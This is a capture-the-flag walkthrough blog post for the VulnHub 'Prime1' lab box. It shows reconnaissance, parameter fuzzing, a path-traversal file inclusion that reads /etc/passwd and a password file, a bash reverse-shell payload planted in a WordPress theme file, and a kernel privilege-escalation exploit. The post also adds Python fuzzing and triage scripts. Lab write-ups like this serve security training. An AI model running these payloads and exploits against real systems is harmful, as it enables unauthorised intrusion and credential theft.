[vulnhub]Prime1

Posted by sunset2131 on 2024-09-22

https://www.vulnhub.com/entry/prime-1,358/

Host discovery and port scanning

  1. Discover live hosts; .137 is the target

    nmap -sP 192.168.75.0/24 
    //                       
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 16:25 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00028s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00026s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.137
    Host is up (0.0010s latency).
    MAC Address: 00:0C:29:69:EE:71 (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00018s latency).
    MAC Address: 00:50:56:F8:B3:1A (VMware)
    Nmap scan report for 192.168.75.131
    Host is up.
    
  2. Scan every TCP port on the target

    nmap -sT --min-rate 10000 -p- 192.168.75.137
    //                   
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:54 CST
    Nmap scan report for 192.168.75.137
    Host is up (0.0014s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    MAC Address: 00:0C:29:69:EE:71 (VMware)
    
  3. Service and OS version scan

    nmap -sT -sV -O -p22,80 192.168.75.137           
    //                     
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:57 CST
    Nmap scan report for 192.168.75.137
    Host is up (0.00045s latency).
    
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    MAC Address: 00:0C:29:69:EE:71 (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    
  4. UDP scan (open|filtered only means no reply came back; none of these ports is confirmed open)

    nmap -sU 192.168.75.137  
    //                       
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:57 CST
    Nmap scan report for 192.168.75.137
    Host is up (0.00073s latency).
    Not shown: 997 closed udp ports (port-unreach)
    PORT     STATE         SERVICE
    68/udp   open|filtered dhcpc
    631/udp  open|filtered ipp
    5353/udp open|filtered zeroconf
    MAC Address: 00:0C:29:69:EE:71 (VMware)
    
  5. Vulnerability scripts

    nmap --script=vuln -p 22,80 192.168.75.137
    //
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       http://ha.ckers.org/slowloris/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    | http-enum: 
    |   /wordpress/: Blog
    |_  /wordpress/wp-login.php: Wordpress login page.
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    MAC Address: 00:0C:29:69:EE:71 (VMware)
    

    The Slowloris result is a DoS check and of no use here. The http-vuln-cve2017-1001000 script did not detect anything: it failed to run at all ("Script execution failed"), so it says nothing about the WordPress version. What the scan does establish is a WordPress install under /wordpress/ with its login page exposed.

  6. Nikto scan

    nikto -host 192.168.75.137 -port 22,80
    //
    - Nikto v2.5.0
    ---------------------------------------------------------------------------
    ---------------------------------------------------------------------------
    + Target IP:          192.168.75.137
    + Target Hostname:    192.168.75.137
    + Target Port:        80
    + Start Time:         2024-09-22 18:44:45 (GMT8)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.18 (Ubuntu)
    + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
    + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
    + /: Web Server returns a valid response with junk HTTP methods which may cause false positives
    + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
    + /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
    + /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
    + /wordpress/wp-admin/: Uncommon header 'x-redirect-by' found, with contents: WordPress.
    + /wordpress/: Drupal Link header found with value: <http://192.168.75.137/wordpress/index.php?rest_route=/>; rel="https://api.w.org/". See: https://www.drupal.org/
    + /wordpress/: A Wordpress installation was found.
    + /wordpress/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
    + /wordpress/wp-content/uploads/: Directory indexing found.
    + /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
    + /wordpress/wp-login.php: Wordpress login found.
    + 8106 requests: 0 error(s) and 14 item(s) reported on remote host
    + End Time:           2024-09-22 18:45:09 (GMT8) (24 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested

    Two of Nikto's lines need reading with care: the "Drupal Link header" is a false positive (a Link header with rel="https://api.w.org/" is WordPress advertising its REST API), and the outdated-Apache line is a banner comparison, not a confirmed vulnerability. The actionable results are the browsable /wordpress/wp-content/uploads/ directory, the version leak via wp-links-opml.php, and the exposed login page.


Web exploitation

  1. Directory brute-force against 192.168.75.137 (dirsearch output)

    [18:49:23] 200 -  131B  - /dev
    [18:49:25] 200 -  137B  - /image.php
    [18:49:26] 301 -  321B  - /javascript  ->  http://192.168.75.137/javascript/
    [18:49:32] 403 -  279B  - /server-status/
    [18:49:32] 403 -  279B  - /server-status
    [18:49:36] 200 -    1KB - /wordpress/wp-login.php
    [18:49:36] 200 -    4KB - /wordpress/
    

    Look at /dev first, since it is not a path a normal site would have:

    hello,
    
    now you are at level 0 stage.
    
    In real life pentesting we should use our tools to dig on a web very hard.
    
    Happy hacking. 
    

    So we are meant to brute-force directories harder?

  2. Run `python .\dirsearch.py -u http://192.168.75.137/ --suffixes .txt,.zip` to brute-force again with .txt and .zip appended to every wordlist entry

    http://192.168.75.137/secret.txt
    

    Its contents:

    Looks like you have got some secrets.
    
    Ok I just want to do some help to you. 
    
    Do some more fuzz on every page of php which was finded by you. And if
    you get any right parameter then follow the below steps. If you still stuck 
    Learn from here a basic tool with good usage for OSCP.
    
    https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
    
    //see the location.txt and you will get your next move//
    

    It tells us to fuzz: every PHP page we have found should be fuzzed for a valid GET parameter name.

  3. Enumerate all PHP files

    dirb http://192.168.75.137 -X .php
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Sun Sep 22 20:12:05 2024
    URL_BASE: http://192.168.75.137/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.75.137/ ----
    + http://192.168.75.137/image.php (CODE:200|SIZE:147)                                                                                      
    + http://192.168.75.137/index.php (CODE:200|SIZE:136)                                                                                      
                                                                                                                                               
    -----------------
    END_TIME: Sun Sep 22 20:12:08 2024
    DOWNLOADED: 4612 - FOUND: 2
    

    Only two PHP files in the web root, so try both.

  4. Fuzz index.php for a parameter name

    Note that the --hh value (136 here) has to be adjusted per target: it is the character count of the baseline response index.php returns for any unknown parameter, so every identical response is hidden. After filtering, only the parameter `file` remains.

    wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.75.137/index.php?FUZZ=something
    // --hh 136 hides every response that is exactly 136 characters long (the baseline)
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************
    
    Target: http://192.168.75.137/index.php?FUZZ=something
    Total requests: 951
    
    =====================================================================
    ID           Response   Lines    Word       Chars       Payload                       
    =====================================================================
    
    000000341:   200        7 L      19 W       206 Ch      "file"                        
    
    Total time: 1.060608
    Processed Requests: 951
    Filtered Requests: 950
    Requests/sec.: 896.6547
    
    
  5. Visit http://192.168.75.137/index.php?file=

    Hint: Do something better you are digging wrong file
    

    Perhaps the value of file needs fuzzing as well; Burp Intruder could do this too.

    But secret.txt also said: //see the location.txt and you will get your next move//

    So visit: http://192.168.75.137/index.php?file=location.txt

    And there is indeed something there:

    Now dig some more for next one
    use 'secrettier360' parameter on some other php page for more fun. 
    

    We are told to use the secrettier360 parameter on some other PHP page. The only other PHP page found besides index.php is image.php.

  6. Fuzz the value of secrettier360 on image.php

    wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 197 http://192.168.75.137/image.php?secrettier360=FUZZ
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************
    
    Target: http://192.168.75.137/image.php?secrettier360=FUZZ
    Total requests: 951
    
    =====================================================================
    ID           Response   Lines    Word       Chars       Payload                       
    =====================================================================
    
    000000257:   200        13 L     43 W       328 Ch      "dev"                         
    
    Total time: 1.031432
    Processed Requests: 951
    Filtered Requests: 950
    Requests/sec.: 922.0189
    

    The value dev produces a different response. Visit: http://192.168.75.137/image.php?secrettier360=dev

    finaly you got the right parameter
    
    hello, now you are at level 0 stage. In real life pentesting we should use our tools to dig on a web very hard. Happy hacking. 
    

    WTF? Isn't that the /dev page from before? But notice that whatever file name you put into secrettier360 gets included, so this is a file inclusion. On a whim I tried PHP pseudo-protocols (wrappers) here, but they did not work; presumably they are disabled.
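
    The two wfuzz runs above are the same technique twice: first ?FUZZ=something on index.php to find a parameter name, then ?secrettier360=FUZZ on image.php to find a value, each time hiding whatever looks like the baseline response. The script below is an added example (not part of the original writeup) that does this with a measured baseline instead of a hand-tuned --hh number: it requests the template with random junk a few times, records the wfuzz-style (status, lines, words, chars) signature of those responses, and reports every payload whose signature differs. `make_fake_target` is a constructed offline stand-in for the box's two PHP pages (the response texts echo the hints seen above, the byte counts are not the real ones); `http_fetch` is the real stdlib fetcher you would pass instead against a live target.

```python
"""Two-stage GET parameter discovery with a measured baseline.

Added example, not part of the original writeup. Reproduces the two wfuzz
runs (parameter name on index.php, parameter value on image.php) but measures
the baseline response instead of hard-coding --hh 136 / --hh 197.
"""
import random
import string
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable

Fetch = Callable[[str], tuple[int, str]]  # url -> (HTTP status, body)
Signature = tuple[int, int, int, int]     # (status, lines, words, chars), as wfuzz prints them


def http_fetch(url: str, timeout: float = 5.0) -> tuple[int, str]:
    """Real fetcher (stdlib only). A 403/500 for one payload is a signal,
    so HTTP errors are returned as responses rather than raised."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, exc.read().decode("utf-8", "replace")


def signature(status: int, body: str) -> Signature:
    return status, body.count("\n"), len(body.split()), len(body)


def measure_baseline(fetch: Fetch, template: str, probes: int = 3) -> set[Signature]:
    """Send the template with random junk in place of FUZZ a few times. If the
    probes disagree the page is dynamic and a single --hh value would need
    manual tuning; keeping every observed variant covers that case."""
    seen: set[Signature] = set()
    for _ in range(probes):
        junk = "".join(random.choices(string.ascii_lowercase, k=12))
        seen.add(signature(*fetch(template.replace("FUZZ", junk))))
    return seen


def fuzz(fetch: Fetch, template: str, words: Iterable[str]) -> list[tuple[str, Signature]]:
    """Return (payload, signature) for every payload whose response differs from
    the baseline. The template works for names (?FUZZ=x) and values (?p=FUZZ).
    Payloads containing reserved characters should be passed through
    urllib.parse.quote first."""
    baseline = measure_baseline(fetch, template)
    hits = []
    for word in words:
        sig = signature(*fetch(template.replace("FUZZ", word)))
        if sig not in baseline:
            hits.append((word, sig))
    return hits


def make_fake_target() -> Fetch:
    """Constructed stand-in for the box's index.php and image.php so the example
    runs offline. Texts echo the hints shown above; sizes are not the real ones."""
    def fetch(url: str) -> tuple[int, str]:
        parts = urllib.parse.urlsplit(url)
        query = urllib.parse.parse_qs(parts.query)
        if parts.path.endswith("/index.php"):
            if "file" in query:
                return 200, "<p>Do something better you are digging wrong file</p>\n"
            return 200, "<p>index</p>\n"
        if parts.path.endswith("/image.php"):
            if query.get("secrettier360", [""])[0] == "dev":
                return 200, ("<p>finaly you got the right parameter</p>\n"
                             "<p>hello, now you are at level 0 stage.</p>\n")
            return 200, "<p>image</p>\n"
        return 404, "Not Found\n"
    return fetch


if __name__ == "__main__":
    target = make_fake_target()  # swap in http_fetch to run against a live box
    base = "http://192.168.75.137"
    print("stage 1, parameter names:",
          fuzz(target, f"{base}/index.php?FUZZ=something", ["id", "page", "file", "dir"]))
    print("stage 2, parameter values:",
          fuzz(target, f"{base}/image.php?secrettier360=FUZZ", ["admin", "dev", "test"]))
```

    Against the real box, a wordlist such as /usr/share/wfuzz/wordlist/general/common.txt would replace the short inline lists, and the reported signature tells you whether a hit is a real content change or just a different status code.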

  7. Exploit the file inclusion

    Try reading /etc/passwd. The web root is /var/www/html, so three ../ climb to /:

    http://192.168.75.137/image.php?secrettier360=../../../etc/passwd
    //
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
    systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false 
    systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false 
    systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false 
    systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false 
    syslog:x:104:108::/home/syslog:/bin/false 
    _apt:x:105:65534::/nonexistent:/bin/false 
    messagebus:x:106:110::/var/run/dbus:/bin/false 
    uuidd:x:107:111::/run/uuidd:/bin/false 
    lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false 
    whoopsie:x:109:117::/nonexistent:/bin/false 
    avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false 
    avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false 
    dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false 
    colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false 
    speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false 
    hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false 
    kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false 
    pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false 
    rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false 
    saned:x:119:127::/var/lib/saned:/bin/false 
    usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false 
    victor:x:1000:1000:victor,,,:/home/victor:/bin/bash 
    mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false 
    saket:x:1001:1001:find password.txt file in my directory:/home/saket: 
    sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin 
    

    Note the entry saket:x:1001:1001:find password.txt file in my directory:/home/saket: . The GECOS comment field is being used as a hint. Very well then.

    http://192.168.75.137/image.php?secrettier360=../../../home/saket/password.txt
    //
    finaly you got the right parameter
    
    follow_the_ippsec 
    

    So the password should be follow_the_ippsec.
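
    The /etc/passwd dump above was read by eye. As an added example (not part of the original writeup), the parser below does the same triage programmatically: it matches whole passwd entries with a regex, which matters because image.php echoes the file into an HTML page and a browser collapses the newlines, so copied entries can run together on one line and GECOS fields such as "find password.txt file in my directory" contain spaces that a whitespace split would destroy. It then lists human accounts (UID >= 1000), accounts whose shell permits login, and any free-text GECOS comment on a human account. The sample input is an excerpt of the dump above, re-flattened the way the browser rendered it.

```python
"""Parse an /etc/passwd dump recovered through the file inclusion above.

Added example, not part of the original writeup. Entries are matched with a
regex rather than split on whitespace, because the browser collapses the
file's newlines and GECOS comments may contain spaces.
"""
import re
from dataclasses import dataclass

# Excerpt of the dump shown above, with the browser-flattened line breaks.
FLATTENED_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin \n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin \n"
    "list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin \n"
    "systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false \n"
    "victor:x:1000:1000:victor,,,:/home/victor:/bin/bash \n"
    "mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false \n"
    "saket:x:1001:1001:find password.txt file in my directory:/home/saket: \n"
    "sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin \n"
)

# name:password:uid:gid:gecos:home:shell ; gecos may contain spaces, shell may be empty.
ENTRY_RE = re.compile(
    r"(?P<name>[A-Za-z_][\w.-]*):(?P<pw>[^:\s]*):(?P<uid>\d+):(?P<gid>\d+):"
    r"(?P<gecos>[^:]*):(?P<home>[^:\s]*):(?P<shell>[^:\s]*)(?=\s|$)"
)

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

    @property
    def effective_shell(self) -> str:
        # passwd(5): an empty shell field means /bin/sh, so the account can still log in.
        return self.shell or "/bin/sh"

    @property
    def interactive(self) -> bool:
        return self.effective_shell not in NOLOGIN_SHELLS


def parse_passwd(text: str) -> list[PasswdEntry]:
    return [
        PasswdEntry(m["name"], int(m["uid"]), int(m["gid"]), m["gecos"], m["home"], m["shell"])
        for m in ENTRY_RE.finditer(text)
    ]


def triage(entries: list[PasswdEntry]) -> dict:
    """What matters after an LFI: human accounts, accounts that can log in, and
    free-text GECOS comments on human accounts (this box hides its hint there).
    A GECOS of 'name,,,' is the default chfn layout and is not a hint."""
    humans = [e for e in entries if e.uid >= 1000 and e.uid != 65534]
    return {
        "humans": [e.name for e in humans],
        "interactive": [e.name for e in entries if e.interactive],
        "gecos_hints": {
            e.name: e.gecos for e in humans
            if e.gecos.strip(",") and e.gecos.strip(",") != e.name
        },
    }


if __name__ == "__main__":
    for key, value in triage(parse_passwd(FLATTENED_PASSWD)).items():
        print(f"{key}: {value}")
```

    The saket entry is worth a second look for another reason: its shell field is empty, which login(1) treats as /bin/sh, so the account is a real login target once its password is known.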

  8. Log in to the WordPress admin with username victor and password follow_the_ippsec

    Why victor? The first post on wordpress/index.php was published by victor, so we guess that is the username. The login succeeds.

Initial shell via the WordPress admin panel

  1. In the dashboard, go to Plugins > Add New > Upload Plugin and try to upload a reverse-shell file


    The upload is refused for lack of permissions, even after turning off the setting that organizes uploads into month- and year-based folders.

  2. Find another place to drop the payload

    Appearance > Theme Editor > secret.php is a file we can edit and save.

    Put the reverse-shell payload in it:

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.75.131/1234 0>&1'");?>
    

    Then save (Update File).

  3. Start a listener on Kali and request the edited file

    http://192.168.75.137/wordpress/wp-content/themes/twentynineteen/secret.php
    
    nc -lvp 1234                          
    listening on [any] 1234 ...
    192.168.75.137: inverse host lookup failed: Unknown host
    connect to [192.168.75.131] from (UNKNOWN) [192.168.75.137] 42312
    bash: cannot set terminal process group (48712): Inappropriate ioctl for device
    bash: no job control in this shell
    www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ 
    

    Initial shell as www-data obtained.

Privilege escalation

  1. Check privileges

    www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l                    
    Matching Defaults entries for www-data on ubuntu:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    User www-data may run the following commands on ubuntu:
        (root) NOPASSWD: /home/saket/enc
    //
    www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ uname -a              
    Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
    

    sudo -l shows that www-data may run /home/saket/enc as root without being asked for a sudo password. The rule names that one binary path only, so nothing else runs as root through it.

    Running enc, however, prompts for a password of its own (the program asking, not sudo), so try something else.

  2. Try a kernel exploit

    searchsploit linux kernel 4.10.0-28 | grep 'Local Privilege'
    Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation                                 | solaris/local/15962.c
    Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation                                         | linux/local/50135.c
    Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation                           | linux/local/47163.c
    Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                                                | linux/local/41886.c
    Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation                         | linux/local/45553.c
    Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                             | linux/local/45010.c
    

    Try the last one, 45010.c: copy it to the target (into /tmp), compile it and run it. The chmod is redundant, since gcc already writes an executable, but harmless. A kernel exploit can also crash the box, so save anything you still need from the www-data shell first.
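
    Picking "the last one" worked here, but with a longer searchsploit list it pays to shortlist by version range first. The script below is an added example (not part of the original writeup): it reads the searchsploit lines shown above, parses the kernel version range each title carries ("< 4.13.9", "4.10 < 5.1.17", "2.6.19 < 5.9"), and compares it against the target's 4.10.0-28 kernel. Two edge cases from the list are handled explicitly: the solaris/ entry is skipped by path, and the UDEV entry's "< 232" is a udev version, not a kernel version, so it is flagged for manual review rather than compared. The regexes and verdict names are mine; the data is the page's. A "candidate" verdict is a reason to read the exploit, not proof of vulnerability: Ubuntu backports fixes without changing the upstream version string.

```python
"""Shortlist searchsploit results by kernel version range.

Added example, not part of the original writeup. Version-range matching on
exploit titles gives a shortlist only; distro kernels backport fixes, so
verify against the distro's CVE tracker before running anything.
"""
import re

# searchsploit output as shown above (the page's own data).
SEARCHSPLOIT_OUTPUT = """\
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation | linux/local/50135.c
Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation | linux/local/47163.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
"""

TARGET_UNAME_R = "4.10.0-28-generic"  # from the uname -a output above

Version = tuple[int, ...]
DOTTED = r"\d+\.\d+(?:\.\d+)*"
# Optional lower bound directly after "Linux Kernel", then anything up to "< upper".
RANGE_RE = re.compile(rf"Linux Kernel\s+(?:(?P<lo>{DOTTED})\s+)?(?:\S+\s+)*?<\s*(?P<hi>\S+)")
EDB_ID_RE = re.compile(r"/(\d+)\.\w+$")


def parse_version(text: str) -> Version:
    """'4.10.0-28-generic' -> (4, 10, 0); the Ubuntu ABI suffix is dropped."""
    m = re.match(r"\d+(?:\.\d+)*", text)
    if not m:
        raise ValueError(f"no version in {text!r}")
    return tuple(int(part) for part in m.group().split("."))


def classify(title: str, path: str, kver: Version) -> str:
    if not path.startswith("linux/"):
        return "skipped"        # wrong platform, e.g. solaris/local
    m = RANGE_RE.search(title)
    if not m or not re.fullmatch(DOTTED, m["hi"]):
        return "manual-check"   # no parsable range, or the bound is not a kernel version (udev 232)
    lo, hi = m["lo"], parse_version(m["hi"])
    # Tuple comparison: (4, 10, 0) >= (4, 10) holds, so "4.10" as a lower bound includes 4.10.0.
    if (lo is None or kver >= parse_version(lo)) and kver < hi:
        return "candidate"
    return "not-in-range"


def triage(searchsploit_output: str, uname_r: str) -> dict[str, list[int]]:
    kver = parse_version(uname_r)
    result: dict[str, list[int]] = {"candidate": [], "manual-check": [], "not-in-range": [], "skipped": []}
    for line in searchsploit_output.splitlines():
        if "|" not in line:
            continue
        title, path = (part.strip() for part in line.rsplit("|", 1))
        id_match = EDB_ID_RE.search(path)
        if not id_match:
            continue            # header or separator line of real searchsploit output
        result[classify(title, path, kver)].append(int(id_match.group(1)))
    return {verdict: sorted(ids) for verdict, ids in result.items()}


if __name__ == "__main__":
    for verdict, ids in triage(SEARCHSPLOIT_OUTPUT, TARGET_UNAME_R).items():
        print(f"{verdict}: {ids}")
```

    For this box four of the six entries come out as candidates; the one the writeup uses, 45010, is among them. Run the same triage with a newer kernel string and the two "< 4.1x" entries drop out, which is the check you want before copying an exploit onto a host.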

    gcc 45010.c -o 45010
    chmod u+x 45010
    ./45010
    
    www-data@ubuntu:/tmp$ ./45010
    //
    uname -a
    Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
    //
    whoami 
    root
    

    Root obtained. Read the flag files; spawn a PTY first for a usable prompt:

    python -c "import pty;pty.spawn('/bin/bash')"    
    //
    root@ubuntu:/tmp# cd /root
    root@ubuntu:/root# ls
    enc  enc.cpp  enc.txt  key.txt  root.txt  sql.py  t.sh  wfuzz  wordpress.sql
    //
    root@ubuntu:/root# cat key.txt
    
    I know you are the fan of ippsec.
    
    So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.